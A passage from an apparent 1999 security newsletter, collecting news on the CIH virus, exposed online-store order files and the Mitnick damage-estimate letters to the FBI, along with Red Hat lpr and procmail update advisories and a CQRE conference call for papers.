imaged concerns associated with each. Chapter 1 - "Morality and the Law": If you can judge a book by the first chapter, this book is a great read. The introduction to morality and the law starts out with clear explanation of what morality is, moral theories, moral decision making, as well as listing well established and general moral codes (such as 'the golden rule'). By defining such concepts as 'guilt' and 'judgment', the reader is well equipped to move on and explore the different facets of ethics, morals, and how they apply to technology. Chapter 2 - "Ethics, Technology, and Values": The various definitions of ethics and the theories of ethics is explained very well. Providing short descriptions of major ethical theories, you begin to realize there are many more concerns than may meet the eye. Continuing on, Kizza creates an equation to explore the relation between ethics and the human mind. This chapter also goes in depth on Codes of Ethics, defines Computer Ethics, and explains *why* you should study Computer Ethics. Chapter 3 - "Ethics and the Professions": Chapter three delves into defining professional requirements and the codes that may apply to them. Kizza describes four codes: professional, personal, institutional, and community. From here, the four 'pillars' of professionalism are outlined and described: Commitment, integrity, responsibility, and accountability. The rest of this chapter deals with the making of an ethical profession, and the attributes that go with it. Chapter 4 - "Anonymity, Security, and Privacy": After defining each of these concepts, real world examples are provided to illustrate each, and help show the reason each is valuable and noteworthy. Perhaps the strongest point is the defintion and breakout of 'privacy', and what it truly entails. Chapter 5 - "Intellectual Property Rights and Computer Technology": Before you can define intellectual property rights, you must qualify what property is in the technical and digital world. Once defined, there are several factors that affect the value and right of use including 'public domain', copyright, patents, 'trade secret' status, trademarks, and more. Last, you must define ownership as well as define what infringement really is. This chapter also goes into how you can better protect what is valuable to you or your company. Chapter 6 - "Computer-Augmented Environments: The Workplace": A few years ago, the 'workplace' was easily defined by four walls in a set location. In today's world, travelling, home and virtual offices have replaced that idea. Chapter six defines this changing world and considers the effects and benefits of each. Section 6.4 goes into explicit detail about the implications and considerations of workplace privacy and surveillance. How do you monitor virtual workers? What rights do you have to monitor home activity? Chapter 7 - "Software Issues": Since software in one form or another controls every computer or computer component, it becomes a more important and fundamental part of our life. Even though we may not understand the languages that make up the software, we must be aware of the elements of software that affect its use. Verification and Validation, reliability, security, safety, and quality are some of the major points examined and brought to light. Section 7.2 delves into the various reasons of why software fails and who is responsible. More importantly, it covers what consumer protection exists, the rights of software buyer's, and more. Chapter 8 - "New Frontiers for Ethical Considerations: Artifical Intelligence, Cyberspace, and Virtual Reality": Most literature on future concepts in computing typically lack material justifying one stance or another. This book differs as it provides solid definitions of areas of computers barely defined, and more importantly, provides reference to existing work in the fields of AI and VR. Chapter 9 - "Ethical and Social Issues in Cyberspace": Perhaps one of the most obscured and widely (mis?)used words to describe computer culture is 'cyberspace'. Rather than try to force an unwieldy definition on the word, Kizza gives the reader a foundation and quick background for the word. That in mind, he moves on to cover the role of copyright, patents, identity, censorship, privacy, and security and how they are affected, as well as how they affect cyberspace. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 35.0 Update your AV software!, CIH to hit April 26th... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Erik Parker http://www.wired.com/news/print_version/technology/story/19280.html?wnpg=all 2:30 p.m. 22.Apr.99.PDT The havoc caused by the Melissa computer virus is tame compared with the destruction expected to strike on 26 April. The CIH virus is believed to be the first virus to attack a PC's BIOS (basic input/output system), the built-in program that helps a machine boot. The virus can overwrite hard drives, and because it has a long incubation period it is now believed to be widely distributed. "It's the most destructive [code] out there," said Roger Thompson, technical director of malicious code research at ICSA, an independent security assurance service that certifies antivirus software. "I think it's pretty bloody important," Thompson said. "We never release warnings about viruses because we don't want to hype them, but we issued a release about this one." Affecting Windows 95, 98, and NT machines, the virus first appeared last spring. Since then, it has spread widely, hidden in software installers on CD-ROMs and floppy disks, in email attachments, and in infected software shared by computer users, Thompson said. The virus is a Windows executable, or .exe, file that, when launched, sits dormant on an infected machine until it drops its "payload." That's expected to happen on Monday. The payload may overwrite the system's hard drive, erasing everything on it. The virus may also attack the portion of the machine's BIOS that affects the start-up sequence, making the computer unusable. However, due to the wide variety of different system designs, virus experts can only guess how many machines will be affected. Though the virus is not irreversible, experts said that resetting the BIOS is a major pain in the neck that's beyond the expertise of most computer dealers, let alone average users. "It's been out there spreading for some time now," said David Chess, a member of the researcher staff at IBM's High Integrity Computing Lab in the Thomas J. Watson Research Center. "It's reached the stage where it's endemic." In fact, the CIH virus was found on a batch of IBM Aptivas earlier this month, forcing Big Blue to issue a warning to thousands of customers. The CIH virus is version 1.2, a variant of the equally destructive Win95-CIH virus, which is timed to strike on the 26th of every month. Described when it appeared last spring as the mother of all viruses because of its destructive behavior, the Win95-CIH virus failed to live up to the hype because of its relative rarity. ICSA's Thompson counseled users to leave email attachments unopened on Monday and to run an updated antivirus program. Because the virus has been in circulation for a long time, almost all antivirus software can detect it. In fact, Thompson said that CIH's impact may have already been lessened by users running antivirus software to check for Melissa. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 36.0 [ISN] More problems with online stores... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: 7Pillars Partners Card numbers, other details easily available at online stores 6.38 a.m. ET (1039 GMT) April 22, 1999 FOOTNOTE: LOS ANGELES (AP) There are gaping holes in the security webs of more than 100 small Internet retailers, allowing anyone with a little computer savvy to obtain shoppers' credit card numbers and other personal information, a technician warned. The retail sites, and probably hundreds more, incorrectly installed "shopping cart'' software that is used to take customer orders, leaving confidential material in files that virtually anyone can find with a World Wide Web search engine, said Joe Harris, a computer technician at Seattle-based Blarg Online Services, an Internet service provider. "There are inexperienced Web site developers out there who don't know how to set up an online store safely, but they don't tell their clients,'' Harris said Wednesday. Harris said he found the problem while reviewing an online store hosted by his service. The Los Angeles Times reported today that it managed to download more than 100 pages of credit card numbers, travel reservations, e-mail and other information from Internet sites. Among the computer programs that are vulnerable include those from Order Form, Seaside Enterprises, QuikStore, PDGSoft and Mercantec. QuikStore said only two of its estimated 700 users have reported problems with the shopping carts. "It's not necessarily their fault,'' said Dwight Vietzke, a spokesman for QuikStore. "These are things that fall through the cracks.'' -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 37.0 Mitnick Documents exposed.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mitnick Documents Exposed contributed by Emmanuel Goldstein Date: 4/23/99 07:45 Received: 4/23/99 07:55 From: Emmanuel Goldstein, emmanuel@2600.com To: undisclosed-recipients:; 2600 has obtained the letters sent to the FBI that were used to help calculate "damages" caused by Kevin Mitnick. The following letters can be thought of as the main reasons why Kevin was able to be held without bail for so long and will no doubt be used at his sentencing on June 14 to impose more harsh conditions. As far as we know, no mention of any of these "losses" was ever made to any of the stockholders of these companies, which to our understanding they are required to do if losses of this magnitude actually took place. We're making these public because the public needs to know how individuals can be locked away for so long just for pissing off powerful corporations. We believe this also demonstrates how the FBI prodded these companies into giving as inflated a figure as possible. Happy reading. emmanuel Sun Microsystems 2550 Garcia Avenue Mountain View, CA 94043 415 960-1300 415 336-0630 fax March 9, 1995 Kathleen Carson Federal Bureau of Investigation 11000 Wilshire Boulevard, Suite 1700 Los Angeles, California 90024 Re: Sun Solaris 2.x Dear Ms. Carson: As you are aware, Sun Microsystems, Inc. experienced a break-in of its computer systems located in our Los Angeles office on or about June 30, 1993. During the break-in, a substantial portion of the source code of Sun's Solaris 2.x software product was apparently copied and removed. Solaris software is a UNIX-based product originally licensed by Sun from AT&T. In March of 1994 Sun bought out its original license with AT&T with a lump sum payment of more than $80 million. In addition, Sun has invested very heavily for more than ten years in the continued development of the Solaris software and values the current product in the hundreds of millions of dollars. Sincerely, Lee Patch Vice President, Intellectual Property Law LP/kl Enclosure ------------------------------ NEC America, Inc. 1555 W. Walnut Hill Lane Irving, Texas 75038-3796 Tel. 214-751-7000 March 9, 1995 Special Agent Kathleen Carson Federal Bureau of Investigation U.S. Department of Justice 11000 Wilshire Boulevard #1700 Los Angeles, CA 90024 Dear Ms. Carson: Please be advised that the software stolen from NEC America, Inc. and its affiliates involves the software design for a NEC cellular mobile telephone and is valued at one million seven hundred fifty thousand dollars ($1,750,000.00). The value is based on the development costs for the stolen software. Please contact me if I can be of any further assistance. Sincerely, Yutaka Ichikawa Vice President & General Manager Communications Terminals Group ------------------------------ Nokia Mobile Phones Ilkka Roman Deputy Security Manager P.O. Box 86 FIN-24101 Salo Finland Telefax: +358 10 505 4303 Telephone: +358 10 505 5153 Mobile: +358 40 501 3773 To: FBI Los Angeles Attn: SA Kathleen Antena [sic] CC: Mr. Urho Ilmonen, Vice President, Legal Fax: +1-310-9963836 Date: Sep. 20, 1996 Subject: ESTIMATED VALUE FOR SOFTWARE ASKED TO BE SENT PRIVILEGED AND CONFIDENTIAL Nokia Mobile Phones was requested and tried to be mislead in early 1994 to send whole material of HD760 project on magnetic tape from Oulu to US as guided by the requesting person. We have estimated the value of the asked material to be: 2.5 M FIM which is according to the current rating (1 US $ = 4.48 FIM) 560,000 US $ This estimation is based on amount of work done to create the material of that project plus additional overhead caused by type approval and other featured necessary to finish the product. v Ilkka Roman NMP Security Deputy Security Manager ------------------------------ NOKIA Mobile Phones (UK) LTD CONFIDENTIAL Ms. Kathleen Carson Special Agent Federal Bureau of Investigation 11000 Wilshire Boulevard Los Angeles, CA 90024 USA February 23, 1995 Dear Ms. Carson: Regarding your telephone request of 21 February 1995 asking for Nokia to put a value on the costs of the software stolen, together with an estimate of the costs of the disruption, I have provided initial estimates of them for you as detailed below: A rough estimate of the development costs of stolen software and tools, including testing is US$ 7.5 Million. The disruption to the Nokia Mobile Phones development community caused by the incidents resulted in our local networks being completely closed for a week and the external networks closed for one month. Lost development time is estimated to have cost the company US$ 7.5 Million and probably a further US $120 Million in lost revenue due to new developments being delayed in reaching the market. There are some costs of disruption to our other divisions, Nokia Research and Nokia Telecommunications, I have not yet been able to ascertain estimates for those divisions. These could be provided in due course. This would lead to a minimum loss estimated to total US $135 Million. I hope that this information satisfies your needs. Yours sincerely John A. Talbot Vice President of Engineering Support Centre ------------------------------ NOVELL February 23, 1995 Cathleen Carson (Via Fax 310-996-3359) Special Agent FBI 11000 Wilshire Blvd Suite 1700 Los Angeles, CA 90024 Dear Special Agent Carson, Novell is greatly relieved that Kevin Mitnick has been apprehended. As you know, several types of source code were taken by Mitnick. To attach a value of the source code taken is a very difficult thing to do, given that Novell's revenues exceed $2,000,000,000/year. However, the cost associated with the development of the source code is well in excess of $75,000,000. A more precise number would require additional research. If you have any questions, please contact me at 801-429-7888. Sincerely, Edward L. Morin Corporate Security ------------------------------ Fujitsu February 22, 1995 VIA FACSIMILE 310/996-3359 & U.S. MAIL Kathleen Carson, Special Agent Federal Bureau of Investigation 11000 Wilshire Boulevard Los Angeles, California 90024 Re: Kevin Mitnick Dear Kathleen: Congratulations on the arrest of Kevin Mitnick. Pursuant to your request, I asked our Cellular group to assess the damages caused to Fujitsu Network Transmission Systems, Inc. ("FNTS") by Mitnick's theft of the source code for the PCX telephone. The information provided to me is as follows: Software development expenses... $1,100,000.00 Research & development expenses.. 1,000,000.00 Total... $2,100,000.00 Additionally, attached is a worksheet showing what it would (will) cost FNTS to recall the PCX phones in the marketplace if the source code has been compromised or is not safe. Please call me at (214) 479-2931 if you need further information. Very truly yours, Melanie W. Scofield Corporate Counsel MWS/lm Attachment cc: George Banash To: Nobuo Yamamolo PCX Recall Cost Analysis COMPANY CONFIDENTIAL Yoichiro Fujino DO NOT RELEASE PCX Recall for Software Rework COST ITEMS- DESCRIPTION PRICE COMMENT REFERENCE Shipping $17.31 Fed. Exp.=$7.50 X 2 + $2.31 (PACKAGE)B5 Pre-check $4.00 Bench test to confirm operational status - 6 min. B6 Labor to upgrade software $8.50 15 min. $ 34.00 per hour B7 QC Cost $4.00 After repair QC check - 6 min. B8 Packing & Handling labor $6.40 Overhead cost to unpack & pack and ticket - 9.6 min. B9 Customer Handling $15.00 Dealer, FASC, End-User Compensation B10 PCX Admin Overhead $2.00 Mass Mailing, Accounting, Repair Admin., Misc. B11 TOTAL $57.21 Total Cost per Recall Unit SUM(B5:B11) GRAND TOTAL $5,517,389.61 Total recall cost for 96,441 unit population Recall for source code rework. Based on population through December 1994. @HWA 38.0 New LPR package (linux) ~~~~~~~~~~~~~~~~~~~~~~~ Return-Path: Resent-Date: 23 Apr 1999 19:00:16 -0000 Resent-Cc: recipient list not shown: ; MBOX-Line: From linux-security-request@redhat.com Fri Apr 23 15:00:15 1999 MBOX-Line: From yocum@fnal.gov Fri Apr 23 15:26:13 1999 Delivered-To: alex-alex@yuriev.com Date: Fri, 23 Apr 1999 13:29:46 -0500 From: yocum@fnal.gov Sender: yocum@sapphire.fnal.gov To: linux-security@redhat.com Message-id: <01JADHFMNA96000DXM@FNAL.FNAL.GOV> Organization: Fermi National Accelerator Laboratories MIME-version: 1.0 X-Mailer: exmh version 2.0zeta 7/24/97 Content-type: text/plain; charset=us-ascii X-moderate: yes Resent-Message-ID: <"9DVWK3.0.PI6._CC8T"@LISTS.REDHAT.COM> Resent-From: linux-security@redhat.com Resent-Reply-To: linux-security@redhat.com X-Mailing-List: archive/latest/69 X-Loop: linux-security@redhat.com Precedence: list Resent-Sender: linux-security-request@redhat.com Subject: [linux-security] Forw: new lpr package This and the following 2 messages are from linux-watch@redhatc.com Dan ___________________________________________________________________________ Dan Yocum | Phone: (630) 840-8525 Linux/Unix System Administrator | Fax: (630) 840-6345 Computing Division OSS/FSS | email: yocum@fnal.gov .~. L Fermi National Accelerator Lab | WWW: www-oss.fnal.gov/~yocum/ /V\ I P.O. Box 500 | // \\ N Batavia, IL 60510 | "TANSTAAFL" /( )\ U ________________________________|_________________________________ ^`~'^__X_ ------- Forwarded Message Return-Path: redhat-announce-list-request@redhat.com Received: from lists.redhat.com (lists.redhat.com [199.183.24.247]) by sapphire.fnal.gov (8.8.7/8.8.7) with SMTP id EAA19654 for ; Fri, 16 Apr 1999 04:26:46 -0500 Received: (qmail 11678 invoked by uid 501); 16 Apr 1999 09:44:16 -0000 MBOX-Line: From redhat-announce-list-request@redhat.com Fri Apr 16 05:44:13 1999 Resent-Date: 16 Apr 1999 09:44:12 -0000 Resent-Cc: recipient list not shown: ; MBOX-Line: From redhat-watch-list-request@redhat.com Fri Apr 16 05:44:12 1999 Date: Fri, 16 Apr 1999 05:20:28 -0400 (EDT) From: Cristian Gafton X-Sender: gafton@alien.devel.redhat.com To: redhat-watch-list@redhat.com Subject: SECURITY: New lpr packages available Message-ID: Approved: ewt@redhat.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Resent-Message-ID: <"CFSJK1.0.HN2.IPM5T"@LISTS.REDHAT.COM> Resent-From: redhat-watch-list@redhat.com Reply-To: redhat-watch-list@redhat.com X-Mailing-List: archive/latest/17 X-Loop: redhat-watch-list@redhat.com X-URL: http://www.redhat.com X-Loop: redhat-announce-list@redhat.com Precedence: list Resent-Sender: redhat-announce-list-request@redhat.com X-URL: http://www.redhat.com Security vulnerabilities have been found in the versions of lpr that ship with Red Hat Linux. Thanks go to the Linux Security Audit team for discovering the vulnerability. It is recommended that all users of Red Hat Linux upgrade to the new packages. Red Hat Linux 5.0,5.1,5.2: ========================== alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/lpr-0.35-0.5.2.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/lpr-0.35-0.5.2.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/lpr-0.35-0.5.2.sparc.rpm Source rpm: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/lpr-0.35-0.5.2.src.rpm Red Hat Linux 4.2: ================== alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/lpr-0.35-0.4.2.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/lpr-0.35-0.4.2.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/lpr-0.35-0.4.2.sparc.rpm Source rpm: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/lpr-0.35-0.4.2.src.rpm Cristian - -- - ---------------------------------------------------------------------- Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UNIX is user friendly. It's just selective about who its friends are. - -- To unsubscribe: mail redhat-watch-list-request@redhat.com with "unsubscribe" as the Subject. - -- To unsubscribe: mail -s unsubscribe redhat-announce-list-request@redhat.com Resent-Date: 23 Apr 1999 19:00:16 -0000 Resent-Cc: recipient list not shown: ; MBOX-Line: From linux-security-request@redhat.com Fri Apr 23 15:00:15 1999 MBOX-Line: From yocum@fnal.gov Fri Apr 23 15:26:13 1999 Delivered-To: alex-alex@yuriev.com Date: Fri, 23 Apr 1999 13:29:46 -0500 From: yocum@fnal.gov Sender: yocum@sapphire.fnal.gov To: linux-security@redhat.com Message-id: <01JADHFMNA96000DXM@FNAL.FNAL.GOV> Organization: Fermi National Accelerator Laboratories MIME-version: 1.0 X-Mailer: exmh version 2.0zeta 7/24/97 Content-type: text/plain; charset=us-ascii X-moderate: yes Resent-Message-ID: <"9DVWK3.0.PI6._CC8T"@LISTS.REDHAT.COM> Resent-From: linux-security@redhat.com Resent-Reply-To: linux-security@redhat.com X-Mailing-List: archive/latest/69 X-Loop: linux-security@redhat.com Precedence: list Resent-Sender: linux-security-request@redhat.com Subject: [linux-security] Forw: new lpr package This and the following 2 messages are from linux-watch@redhatc.com Dan ___________________________________________________________________________ Dan Yocum | Phone: (630) 840-8525 Linux/Unix System Administrator | Fax: (630) 840-6345 Computing Division OSS/FSS | email: yocum@fnal.gov .~. L Fermi National Accelerator Lab | WWW: www-oss.fnal.gov/~yocum/ /V\ I P.O. Box 500 | // \\ N Batavia, IL 60510 | "TANSTAAFL" /( )\ U ________________________________|_________________________________ ^`~'^__X_ ------- Forwarded Message Return-Path: redhat-announce-list-request@redhat.com Received: from lists.redhat.com (lists.redhat.com [199.183.24.247]) by sapphire.fnal.gov (8.8.7/8.8.7) with SMTP id EAA19654 for ; Fri, 16 Apr 1999 04:26:46 -0500 Received: (qmail 11678 invoked by uid 501); 16 Apr 1999 09:44:16 -0000 MBOX-Line: From redhat-announce-list-request@redhat.com Fri Apr 16 05:44:13 1999 Resent-Date: 16 Apr 1999 09:44:12 -0000 Resent-Cc: recipient list not shown: ; MBOX-Line: From redhat-watch-list-request@redhat.com Fri Apr 16 05:44:12 1999 Date: Fri, 16 Apr 1999 05:20:28 -0400 (EDT) From: Cristian Gafton X-Sender: gafton@alien.devel.redhat.com To: redhat-watch-list@redhat.com Subject: SECURITY: New lpr packages available Message-ID: Approved: ewt@redhat.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Resent-Message-ID: <"CFSJK1.0.HN2.IPM5T"@LISTS.REDHAT.COM> Resent-From: redhat-watch-list@redhat.com Reply-To: redhat-watch-list@redhat.com X-Mailing-List: archive/latest/17 X-Loop: redhat-watch-list@redhat.com X-URL: http://www.redhat.com X-Loop: redhat-announce-list@redhat.com Precedence: list Resent-Sender: redhat-announce-list-request@redhat.com X-URL: http://www.redhat.com Security vulnerabilities have been found in the versions of lpr that ship with Red Hat Linux. Thanks go to the Linux Security Audit team for discovering the vulnerability. It is recommended that all users of Red Hat Linux upgrade to the new packages. Red Hat Linux 5.0,5.1,5.2: ========================== alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/lpr-0.35-0.5.2.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/lpr-0.35-0.5.2.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/lpr-0.35-0.5.2.sparc.rpm Source rpm: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/lpr-0.35-0.5.2.src.rpm Red Hat Linux 4.2: ================== alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/lpr-0.35-0.4.2.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/lpr-0.35-0.4.2.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/lpr-0.35-0.4.2.sparc.rpm Source rpm: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/lpr-0.35-0.4.2.src.rpm Cristian - -- - ---------------------------------------------------------------------- Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UNIX is user friendly. It's just selective about who its friends are. - -- To unsubscribe: mail redhat-watch-list-request@redhat.com with "unsubscribe" as the Subject. - -- To unsubscribe: mail -s unsubscribe redhat-announce-list-request@redhat.com Resent-Date: 23 Apr 1999 19:00:39 -0000 Resent-Cc: recipient list not shown: ; MBOX-Line: From linux-security-request@redhat.com Fri Apr 23 15:00:37 1999 X-From_: linux-security-request@redhat.com Fri Apr 23 20:30:24 1999 Date: Fri, 23 Apr 1999 13:30:16 -0500 From: yocum@fnal.gov Sender: yocum@sapphire.fnal.gov To: linux-security@redhat.com Cc: yocum@fnal.gov Message-id: <01JADHG8E7XK000EP8@FNAL.FNAL.GOV> Organization: Fermi National Accelerator Laboratories MIME-version: 1.0 X-Mailer: exmh version 2.0zeta 7/24/97 Content-type: text/plain; charset=us-ascii X-moderate: yes Resent-Message-ID: <"XK2B_.0.RT6.LDC8T"@LISTS.REDHAT.COM> Resent-From: linux-security@redhat.com Resent-Reply-To: linux-security@redhat.com X-Mailing-List: archive/latest/70 X-Loop: linux-security@redhat.com Precedence: list Resent-Sender: linux-security-request@redhat.com Subject: [linux-security] Forw: new procmail package ___________________________________________________________________________ Dan Yocum | Phone: (630) 840-8525 Linux/Unix System Administrator | Fax: (630) 840-6345 Computing Division OSS/FSS | email: yocum@fnal.gov .~. L Fermi National Accelerator Lab | WWW: www-oss.fnal.gov/~yocum/ /V\ I P.O. Box 500 | // \\ N Batavia, IL 60510 | "TANSTAAFL" /( )\ U ________________________________|_________________________________ ^`~'^__X_ ------- Forwarded Message Return-Path: redhat-watch-list-request@redhat.com Received: from lists.redhat.com (lists.redhat.com [199.183.24.247]) by sapphire.fnal.gov (8.8.7/8.8.7) with SMTP id EAA19659 for ; Fri, 16 Apr 1999 04:28:25 -0500 Received: (qmail 15370 invoked by uid 501); 16 Apr 1999 09:45:57 -0000 Resent-Date: 16 Apr 1999 09:45:57 -0000 Resent-Cc: recipient list not shown: ; MBOX-Line: From redhat-watch-list-request@redhat.com Fri Apr 16 05:45:56 1999 Date: Fri, 16 Apr 1999 05:22:11 -0400 (EDT) From: Cristian Gafton X-Sender: gafton@alien.devel.redhat.com To: redhat-watch-list@redhat.com Subject: SECURITY: new procmail packages available Message-ID: Approved: ewt@redhat.com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Resent-Message-ID: <"Q6NS4.0.IL3.JRM5T"@LISTS.REDHAT.COM> Resent-From: redhat-watch-list@redhat.com Reply-To: redhat-watch-list@redhat.com X-Mailing-List: archive/latest/18 X-Loop: redhat-watch-list@redhat.com Precedence: list Resent-Sender: redhat-watch-list-request@redhat.com X-URL: http://www.redhat.com Potential security problems have been identified in all the procmail packages shipped with Red Hat Linux. Currently Red Hat is not aware of any explots built on these vulnerabilities. Red Hat would like to thank the members of the Bugtraq list for reporting these problems and the authors of procmail for quickly providing an update. Users of Red Hat Linux are recommended to upgrade to the new packages available under updates directory on our ftp site: Red Hat Linux 5.0,5.1 and 5.2: ============================== alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/procmail-3.13.1-1.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/procmail-3.13.1-1.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/procmail-3.13.1-1.sparc.rpm Source rpm: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/procmail-3.13.1-1.src.rpm Red Hat Linux 4.2: ================== alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/procmail-3.13.1-0.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/procmail-3.13.1-0.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/procmail-3.13.1-0.sparc.rpm Source rpm: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/procmail-3.13.1-0.src.rpm Cristian - -- - ---------------------------------------------------------------------- Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ UNIX is user friendly. It's just selective about who its friends are. - -- To unsubscribe: mail redhat-watch-list-request@redhat.com with "unsubscribe" as the Subject. ------- End of Forwarded Message -- ---------------------------------------------------------------------- Please refer to the information about this list as well as general information about Linux security at http://www.aoy.com/Linux/Security. ---------------------------------------------------------------------- To unsubscribe: mail -s unsubscribe linux-security-request@redhat.com Received: from secunet.de (huehnlein.cubis.de [10.0.129.33]) by stax05.cubis.de (8.7.5/8.7.3) with ESMTP id PAA02374; Fri, 23 Apr 1999 15:04:16 +0200 (MET DST) Message-ID: <37207D2C.B78F8881@SECUNET.DE> Date: Fri, 23 Apr 1999 15:01:16 +0100 From: "Detlef Hühnlein" Organization: Secunet GmbH - The Trust Company X-Mailer: Mozilla 4.03 [en] (WinNT; I) MIME-Version: 1.0 To: "cqre@secunet.de" Subject: Final Call for Papers - CQRE [Secure] networking Content-Type: text/plain; charset=iso-8859-1 X-MIME-Autoconverted: from quoted-printable to 8bit by beasley.paix.gnac.net id HAA10953 Sender: firewalls-owner@lists.gnac.net Precedence: bulk X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id MAA23257 Hallo! Please accept my sincere appologies, if you receive this Final Call for Papers multiple times. The mail is just to remind you that there are only !!! THREE !!! more weeks until the deadline for submission of extended abstracts on May 14th, 1999. Recent news: * best paper award at CQRE * publication of proceedings in Springer's LNCS * first invited speakers: - Stephen Kent (GTE) - Bruce Schneier (Counterpane) - Helena Handschuh (Gemplus/ENST) Best regards Detlef Huehnlein *************************************************************** Final Call for Papers CQRE [Secure] Congress & Exhibition Duesseldorf, Germany, Nov. 30 - Dec. 2 1999 --------------------------------------------------------------- provides a new international forum covering most aspects of information security with a special focus to the role of information security in the context of rapidly evolving economic processes. --------------------------------------------------------------- Deadline for submission of extended abstracts: May 14, 1999 CQRE - website: http://www.cqre.net (under construction) CfP - at: http://www.secunet.de/forum/cqre.html mailing-list: send mailto:cqre@secunet.de (where the subject is "subscribe" without paranthesis) *************************************************************** The "CQRE [Secure] networking" provides a new international forum giving a close-up view on information security in the context of rapidly evolving economic processes. The unprecedented reliance on computer technology transformed the previous technical side-issue "information security" to a management problem requiring decisions of strategic importance. Hence, the targeted audience represents decision makers from government, industry, commercial, and academic communities. If you are developing solutions to problems relating to the protection of your country´s information infrastructure or a commercial enterprise, consider submitting a paper to the "CQRE [Secure] networking" conference. We are looking for papers and panel discussions covering: * electronic commerce - new business processes - secure business transactions - online merchandising - electronic payment / banking - innovative applications * network security - virtual private networks - security aspects in internet utilization - security aspects in multimedia applications - intrusion detection systems * legal aspects - digital signatures acts - privacy and anonymity - crypto regulation - liability * corporate security - access control - secure teleworking - enterprise key management - IT-audit - risk / disaster management - security awareness and training - implementation, accreditation, and operation of secure systems in a government, business, or industry environment * security technology - cryptography - public key infrastructures - chip card technology - biometrics * trust management - evaluation of products and systems - international harmonization of security evaluation criterias * standardization * future perspectives Any other contribution addressing the involvement of IT security in economic processes will be welcome. Authors are invited to submit an extended abstract of their contribution to the program chair. The submissions should be original research results, survey articles or "high quality" case studies and position papers. Product advertisements are welcome for presentation, but will not be considered for the proceedings. Manuscripts must be in English, and should not be more than 2.000 words. The extended abstracts should be in a form suitable for anonymous review, with no author names, affiliations, acknowledgements or obvious references. Contributions must not be submitted in parallel to any conference or workshop that has proceedings. Separately, an abstract of the paper with no more than 200 words and with title, name and addresses (incl. an E-mail address) of the authors shall be submitted. In the case of multiple authors the contacting author must be clearly identified. We strongly encourage electronic submission in Postscript format. The submissions must be in 11 pt format, use standard fonts or include the necessary fonts. Proposals for panel discussions should also be sent to the program chair. Panels of interest include those that present alternative/controversial viewpoints or those that encourage lively discussions of relevant issues. Panels that are collections of unrefereed papers will not be considered. Panel proposals should be a minimum of one page describing the subject matter, the appropriateness of the panel for this conference and should identify participants and their respective viewpoints. best paper award: This award will be presented at CQRE to the authors of the best paper to be selected by the program committee. mailing list/ web-site: If you want to receive emails with up to date information, please send a brief mail to cqre@secunet.de. You will find this call for papers and further information at http://www.secunet.de/forum/cqre.html. publication: The proceedings will be published by Springer-Verlag in the Lecture Notes of Computer Science (LNCS) Series. The final papers must be prepared as described in http://www.springer.de/comp/lncs/authors.html. important dates: deadline for submission of extended abstracts May 14, 1999 deadline for submission of panel proposals June 1, 1999 notification of acceptance June 25, 1999 deadline for submission of complete papers July 30, 1999 program committee: Johannes Buchmann (TU Darmstadt) Dirk Fox (Secorvo) Walter Fumy (Siemens) Ruediger Grimm (GMD) Helena Handschuh (ENST/Gemplus) Thomas Hoeren (Uni Muenster) Pil Joong Lee (POSTECH) Alfred Menezes (U.o.Waterloo/Certicom) David Naccache (Gemplus) Clifford Neumann (USC) Joachim Posegga (German Telekom) Mike Reiter (Bell Labs) Matt Robshaw (RSA) Richard Schlechter (EU-comm.) Bruce Schneier (Counterpane) Tsuyoshi Takagi (NTT) Yiannis Tsiounis (GTE Labs) Michael Waidner (IBM) Moti Yung (CERTCO) Robert Zuccherato (Entrust) program chair: Rainer Baumgart secunet - Security Networks GmbH Weidenauer 